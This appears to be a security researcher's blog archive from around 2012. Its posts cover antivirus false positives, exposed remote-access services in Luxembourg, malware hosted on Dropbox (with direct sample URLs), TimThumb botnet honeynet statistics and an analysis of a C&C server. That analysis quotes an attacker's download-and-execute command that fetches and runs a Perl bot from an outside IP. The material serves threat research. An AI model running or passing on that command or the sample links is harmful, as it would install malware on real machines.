Various

10 of 10 malwares detected by Mac Sophos Anti-Virus are false positives. Does yours?

0
3 days ago
in

On April 24, Sophos Naked Security blog had publish a post regarding malware infections on Mac OS X. Sophos has claim that 20% of Mac computers where carrying one or more instances of Windows malwares. All these malwares where detected though they’re free Sophos Anti-Virus for Mac Home Edition.

Flashback malware was the big story of April for Mac consumers and all anti-virus company have jump on this opportunity to promote they’re products and to distill propaganda around Mac OS X security. I agree with them Mac OS X is a product like other product, and Mac OS X has also to be protected against threats, but the proposed solutions are worse than to do nothing.

 

During my tests of Sophos Anti-Virus for Mac Home Edition 10 of 10 malwares detected by the anti-virus were false positives harassing me with constant alert pop-up during regular operations, Spotlight indexing, Time Machine backup. Here under a sample of 10 infections detected by Sophos Anti-Virus for Mac.

Perl/FtpExp-A

False positives due to binary format of the “affected” files.

/Users/xxxx/Library/Saved Application State/com.twitter.twitter-mac.savedState/window_1.data
/Users/xxxx/Library/Preferences/Macromedia/Flash Player/macromedia.com/support/flashplayer/sys/#s.ytimg.com/settings.sol

Troj/BredoZp-JO

Sophos him self is a trojan, and some iTunes applications and Chrome are backdoored and nobody known about it.

/Library/Preferences/com.sophos.sav.plist
/Users/xxxx/Music/iTunes/iTunes Media/Mobile Applications/iSSH 5.3.1.ipa
/Users/xxxx/Library/Saved Application State/com.google.Chrome.savedState/windows.plist

Troj/BredoZp-JN

iTunes is a very well-known backdoored software and one more time Sophos him self contain a trojan.

/Users/xxxx/Library/Caches/com.apple.iTunes/goog-phish-shavar.db
/Library/Preferences/com.sophos.sav.plist

Troj/Iframe-HY

One more time Sophos is a trojan, and now my Spotlight indexed files are also containing backdoor.

/Library/Preferences/com.sophos.sav.plist,
/Volumes/xxxx/.Spotlight-V100/Store-V2/700BF07C-170F-482E-A2BB-45EF8501935C/0.indexPostings

Mal/IRCBot-O 

VLC is containing an IRC bot, gotcha remote control of all VLC users.

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Troj/PhpShell-Z

One more time VLC how is containing a PHP trojan …

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Mal/PHPShell-A 

Everybody know that Sophos Anti-Virus products are developed in PHP.

/Library/Preferences/com.sophos.sav.plist

Troj/PDFJs-B 

Help my logs are containing trojans and Sophos one more time.

/private/var/log/DiagnosticMessages/2012.05.05.asl
/Library/Preferences/com.sophos.sav.plist

Mal/Badsrc-C

My Spotlight indexing has a dead malware…

/.Spotlight-V100/Store-V2/DeadFiles/orphan.ef786332/0000/0000/0151/22087716.txt

Troj/PhoexRef-A

Hu my screenshot of Metasploit are containing trojans (why not, lol) and Google drive is backdoored.

/Users/xxxx/Desktop/screenshots/metasploit-vmware-modules-research.png
/Users/xxxx/Library/Application Support/Google/Drive/sync_config.db
/usr/share/zoneinfo/UTC
/Library/Preferences/com.sophos.sav.plist

In conclusion Sophos is more strong to do marketing and give fear to consumers than to create a good Mac anti-virus that really detect something.

Luxembourg Critical Remote Management Applications Attack Surface

0
1 month ago
in

MS12-020 patch is now out since a month with associate DoS PoC’s available for pen tester’s and other populations how have not equivalent ethic. Lot of articles, blog posts have been written around CVE-2012-0002, a vulnerability discovered by Luigi Auriemma in May 2011, reported to ZDI in August 2011 and disclosed in a coordinated manner in March 2012.

One of these MS12-020 related articles was written by Dan Kaminsky, “RDP and the Critical Server Attack Surface“. This blog post fact to remember that some applications are more critical than others due to they’re roles and they’re expositions to Internet.

Dan has scan around 300 million IPs, who are representing around 8.3% of the Internet, and 415 thousands showed an open RDP (3389/TCP), a ratio of 0,14%. By extrapolation Dan has arrived to around 5 million RDP endpoints on the Internet. Hopefully for the Internet community (should I say for the sysadmins ?), despite the efforts by security researches (most on freenode #ms12-020), MS12-020 has “only” lead to a DoS exploit. Potentially 5 million BSoD’s (Blue Screen of Death), it is a blessing in disguise ?

In his article Dan Kaminsky has also remember us that other critical server attack surfaces are existing on Internet, such as TCP/IP, HTTP, SSL, SSH, DNS or SMTP, and that all these applications are playing potential essential roles for business.

I have done the same study for the Luxembourg landscape with around 550 000 IP addresses, but before giving my results I would like to explain you what is Luxembourg :)

If you don’t know, Luxembourg has the higher GDP in Europe and is classified in the top 3 of the list of countries by GDP per capita (Wikipedia source). Also more than 90% of population is using Internet and 82% of the population connect to Internet daily. Luxembourg became the geography with the highest ratio of malicious email activity in February 2012 regarding Symantec Intelligence Report.

Also Luxembourg has a total balance sheet of Euro 776 billion in credit institutions and the Luxembourg banking sector comprised 143 credit institutions from over 20 different countries (pwc Luxembourg source). All of these credit institutions are under the CSSF (Commission de Surveillance du Secteur Financier) surveillance and most of them are delegating their IT management to PSF (Professionals of the Financial Sector), also known as “Primary IT systems operators” and “Secondary IT systems and network operators“.

In conclusion most of the IP addresses assigned to Luxembourg have a potential high asset value for bad guys. Luxembourg IP addresses ranges assigned for Internet broadband access, have surely a bigger return on investment compared to other countries in case phishing or malware campaigns. Also IP addresses ranges assigned to professionals of the financial sector are surely hosting e-banking or fund transactions infrastructures, a prime target for cyber crime.

So, what are the results for Luxembourg, a country how normally should have a less ratio of exposition than others du to the fact that an IP address has a higher asset value than 300 million addresses arbitrary scanned. I have only focus on applications equivalent to RDP, these applications are known as “Remote Access Services” (RDP, ssh, telnet, VNC, PCAnywhere, Citrix, etc.).

In “2012 Verizon Data Breach Report“, “Remote Access Services” are noted “as continuing their rise in prevalence, as hacking vector, accounting for 88% of all breaches leveraging hacking techniques – more than any other vector“. Remote services accessible from the entire Internet, combined non patched applications, with default, weak, or stolen credentials continue to plague organizations. Scripted attacks seeking victims with known remote access ports, followed with issuance of known default vendor credentials, allow for targets of opportunity to be discovered and compromised in an automated and efficient manner.

Do you remember, Dan Kaminsky had discovered a ratio of 0,14% of open RDP on 300 million IPs. In Luxembourg, this ratio is 0,26%, twice Dan ratio. For ssh the ratio of open port is 0,79%, for telnet the ratio is 0,31% (still open telnet despite best practices ?), for VNC the ratio is 0,06% and for PCAnywhere the ratio is 0,02% (still open PCAnywhere despite the leaked source code ?).

Shouldn’t Luxembourg have a less ratios of open ports for “Remote Access Services” ? I think YES. But why are these ratios so important ? Surely because Security has fail in his mission, surely because Security is still understood as technical game and not as an insurance to protect the value of assets. Also maybe the cause could be that Internet is growing to fast and that the Internet grow speed don’t give the time to learn from errors. Internet maybe distort the reality, the memory and the time.

Just to remember a small list of vulnerabilities or backdoor’s how have target these critical remote server surfaces :

2012 :

  • SSH : cisco-sa-20120328-ssh - Cisco IOS Software Reverse SSH Denial of Service Vulnerability
  • RDP : CVE-2012-0002 - Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability
  • PCAnywhere : OSVDB-79412 - PCAnywhere 12.5.0 build 463 Denial of Service
2011 :
  • Telnet : CVE-2011-4862 - FreeBSD Telnet Service Encryption Key ID Buffer Overflow
  • FTP : OSVDB-73573 – vsftpd-2.3.4 backdoor
  • SSH : EBD-ID-17462 – OpenSSH 3.5p1 Remote Root Exploit for FreeBSD
2010 :
  • SMTP : CVE-2010-4344 – Exim4 <= 4.69 string_format Function Heap Buffer Overflow
  • FTP : OSVDB-69562 –  ProFTPD 1.3.3c compromised source remote root Trojan
  • FTP : CVE-2010-3867 – ProFTPD IAC Remote Root Exploit
  • FTP : OSVDB-62134 – Easy FTP Server v1.7.0.11 Multiple Commands Remote Buffer Overflow Exploit (Post Auth)
2009 :
  • FTP : CVE-2009-3023 – Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)
2008 :
  • DNS : CVE-2008-1447 – Remote DNS Cache Poisoning Flaw Exploit
  • SSH : CVE-2008-0166 – Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
Etc. Etc.

Should Dropbox be Shutdown for Spreading Mass Malwares ?

1
2 months ago
in

Blog posts on Symantec and ThreatPost have point the fact that Dropbox is used by bad guys to spread spam and phishing campaigns and also malwares. All theses malwares, files used in phishing and spamming campaigns coming from the “Public Folder” of malicious Dropbox accounts. Any file put in this folder gets its own Internet link so that he can be shared with others. Examples of malwares spread by Dropbox :

http://dl.dropbox.com/u/58336523/x/login.php, PHP/IRCBOT used in remote file inclusion campaigns.

http://dl.dropbox.com/u/63038576/Script.exe, WORM/Ainslot.A.1946 used in infection campaigns.

The problem is that Dropbox is not spreading malwares since few days. If you take a look at Clean MX database, Dropbox is present since 2010-04-19, with an explosion of malwares in 2011. The fact that Dropbox spread malwares is real and it is the case since long time. Dropbox is also present in Malc0de database since 2012-02-26.

Compared to other malware spreaders, Dropbox has a privileged status. For example, in November 2011, FileAve.com a free file hosting provider notorious for spreading thousands of malwares were shutdown after years of activities. FileAve.com have provide 50 MB free storage and a free sub domain for each created account (ex : http://yourname.fileave.com). FileAve.com was present in Clean MX database since the 2007-11-30, in Malc0de database since the 2010-01-11 and in our database since the 2009-02-16. The shutdown of FileAve.com was a good news for every one.

We can ask us a legitimate question, should Dropbox be shutdown, same as for FileAve.com ? Aren’t they both malware spreaders ?

WordPress TimThumb Botnets Spreads Status

0
4 months ago
in ,

Since the discovery of the WordPress TimThumb vulnerability in August 2011 by Mark Maunder, the vulnerability has been used as botnet recruitment vector, and has now spread in multiple botnets. Hundreds of WordPress blogs have been hacked, allowing potential infection of the blogs visitors, diffusion of spam and phishing campaign, DDoS, hack of other web sites (such as About.us domain name registrar), etc, etc. Some of these infected WordPress were controlled by well known C&C servers used and shared by black hats from around the world.

We are soon six month after the discovery of the vulnerability and a status on the WordPress TimThumb botnets could be done. Are the botnets still active, are less WordPress blogs vulnerable, is the pick of spread over ? We will try, through an analysis of all the WordPress TimThumb vulnerability exploitation attempts against our Honey Net, to answer these questions. The datas collected through our Honey Net are representing only a small part of the real activity of the WordPress TimThumb botnets, but these datas could also represent an extrapolation of the real activities.

List of all detected infected domains

You can find in the following table the complete list of all detected infected domains how were called during the WordPress TimThumb RFI attack, with the domain associated IP address, the country where the blog were hosted, the number of distinct source IPs how have call the related domain during the RFI attack and the live time of the domain name.

We have a total of 202 affected domains. “blogger.com.dollhousedelights.com“, hosted in Vietnam, was the affected domain how was called by the much more distinct source IPs (258), followed by “picasa.com.xpl.be” with 152 distinct source IPs, and at the third place “blogger.com.midislandrental.com” with 110 distinct source IPs.

picasa.com.xpl.be” and “picasa.computergoogle.co.cc” have the longer live time with 105 days, followed by “wordpress.com.hostdail.com” and “blogger.com.pasbar.com” with 72 days.

Infected blogs countries repartition

You can find in the following graphs (Chart1Chart2) the geographically repartition of the infected blogs.

We have a total of 31 different countries for 202 affected domains. United States is in first position with 58.9% (129) of all infected blogs, followed by Australia, Canada and United Kingdom with each 3.7% (8) of all infected blogs.

Infected blogs countries repartition by number of source IPs

You can find in the following graphs (Chart3Chart4) the geographically repartition of the infected blogs by number of distinct source IPs how have call the infected blogs.

We have a total of 1734 distinct source IPs for 202 affected domains and 31 different hosting countries. United States is in first position with 48.5% (841), followed by Vietnam with 14% (243), Indonesia with 4.7% (82) and Taiwan with 4.1% (71).

Timeline by day of infected blogs calls and source IPs

You can find in the following timeline (Chart5) a representation by day of the infected blogs number calls and source IPs.

November 2011 was the most active month for the number of source IPs and that in December the number of source IPs has drastically decrease. You can see that during the first half of November the number of infected blogs calls have increase days after days, and since the 22 November the number of infected blogs is stabilized but is not decreasing.

Geographic timeline by day of all source IPs

In this geographic time map we’re loading datas from a Google Spreadsheet (published here). These datas are coming from our HoneyNet and are representing the geographic Wordpress TimThumb Botnet activities from 15-09-2011 to 03-12-2011.

AfterGlow representation of the WordPress TimThumb

By clicking on the following link, you can download an AfterGlow representation of the WordPress TimThumb botnets with links between each nodes.

Conclusion

WordPress TimThumb botnets are still continuing to infect new blogs, but the associated activities are decreasing since second half December. Maybe black hats are still in holidays :) My personal opinion is that we will steal continu to hear about these botnets during complete 2012.

gangbang.mytijn.org Malware Spreader Down

0
4 months ago
in

By analyzing the payloads and associated C&C used by the WordPress Timthumb botnets, I founded an interesting C&C server named “gangbang.mytijn.org“. And in collaboration with Luxembourg CIRCL, the domain gangbang.mytijn.org is down since the 14 December 2011. This C&C server was known for spreading tonnes of malwares on Internet.

The initial infected WordPress sites were :

  • 222.255.77.90 – AS7643 – Vietnam

This infected server was first seen the 2011-11-05 18:54:22 and last seen the 2011-11-28 05:05:55. 214 distinct source IPs have call malwares hosted on three different virtual hosts. These three virtual hosts were blogger.com.dollhousedelights.comimg.youtube.com.dollhousedelights.com and blog.ssis.edu.vn.

blogger.com.dollhousedelights.com has spread 2 different malwares (PHP backdoor):

/.mods/sh.php - MD5: 027d17ab2ef49d442377c126dfa8fd1f - First seen the 2011-11-05 18:55:02
/.mods/index.php - MD5: 51ad7df89f3e7162128b9d642a7ec75b - First seen the 2011-11-05 18:55:05

img.youtube.com.dollhousedelights.com has spread 4 different malwares :

/.mods/sh.php - MD5: b545d6934b776026e6bbfd1f7ef4bb27 - First seen the 2011-11-17 07:37:15
/.mods/sh.php - MD5: acbc38367ffd62c42e1ae20c24890b55 - First seen the 2011-11-23 01:50:04
/.mods/index.php - MD5: 4ba8b20decc7605720ce2637ae51893c - First seen the 2011-11-27 23:50:04
/.mods/sh.php - MD5: ec1766b6a365db5099f53c85ad2ed2f1 - First seen the 2011-11-28 02:25:04

All “sh.php” malwares were PHP backdoor, and the “index.php” was a PHP IRC bot.

blog.ssis.edu.vn has spread one malware (PHP backdoor):

/.mods/pbot.txt? - MD5: 8da596365d76ce39bee05c75c2c0030b - First seen the 2011-11-17 07:25:05
  • 192.83.167.206 – AS9505 – Taiwan

This infected server was first seen the 2011-11-28 03:30:09 and last seen the 2011-12-08 03:06:44. 71 distinct source IPs have call malwares hosted on three different virtual hosts. These three virtual hosts were blogger.com.dollhousedelights.comimg.youtube.com.dollhousedelights.com and img.youtube.com.midislandrental.com. As you can see blogger.com.dollhousedelights.com and img.youtube.com.dollhousedelights.comwere load balanced (DNS round robin).

blogger.com.dollhousedelights.com has spread 1 malware (PHP Backdoor):

/.mods/pbot.txt? - MD5: 8da596365d76ce39bee05c75c2c0030b - First seen the 2011-11-28 03:35:03

img.youtube.com.dollhousedelights.com has spread 3 different malwares:

/.mods/sh.php - MD5: 027d17ab2ef49d442377c126dfa8fd1f - First seen the 2011-11-28 05:20:03
/.mods/index.php - MD5: 4ba8b20decc7605720ce2637ae51893c - First seen the 2011-11-28 05:35:07
/.mods/sh.php - MD5: e2b94559ff0c3d9219b3a43bf6dcd8bd - First seen the 2011-11-29 07:15:03

All “sh.php” malwares were PHP backdoor, and the “index.php” was a PHP IRC bot.

  • Analyzing the C&C servers

The PHP IRC bot was interesting, cause he invoke the potential first C&C server. You can find the encoded and decoded versions of the PHP IRC bot on pastbin. This script also permit to execute commands on the affected server and execute UDP or TCP flood attacks.

You can see that the first C&C server is gangbang.mytijn.org on port 23232/TCP and the #wWw# channel is protected by password. Also it is required to display a particular nick name, ident and real name in order to be identified on the IRC server.

Also by digging gangbang.mytijn.org domain name at different time, we can see that the domain was load balanced by using DNS round robin method. Each IP addresses present in the round robin load balancing had also the port 23232/TCP open.

By playing with Cuckoo Sandbox, the first C&C owners have execute some commands on the sandbox, and permit me to analyse the java.txt file.

cd /tmp && rm -rf java.txt && wget http://72.41.115.123/.mods/java.txt && chmod 755 java.txt && perl java.txt && … && rm -rf java.txt

You can also find the java.txt script on pastebin. This script connects to second C&C server, making the first C&C only a proxy. But this script also permit to execute different attacks like RFI, LFI, SQL injection and targeting specific web applications like e107, osCommerce and WordPress.

The second C&C server is known as irc.javairc.org on port 6667/TCP. Most of the affected machines were located on this IRC server.

Some funny conversations were made by the C&C owners and all this conversations were done in Indonesian.

Get Adobe Flash player
Go to Top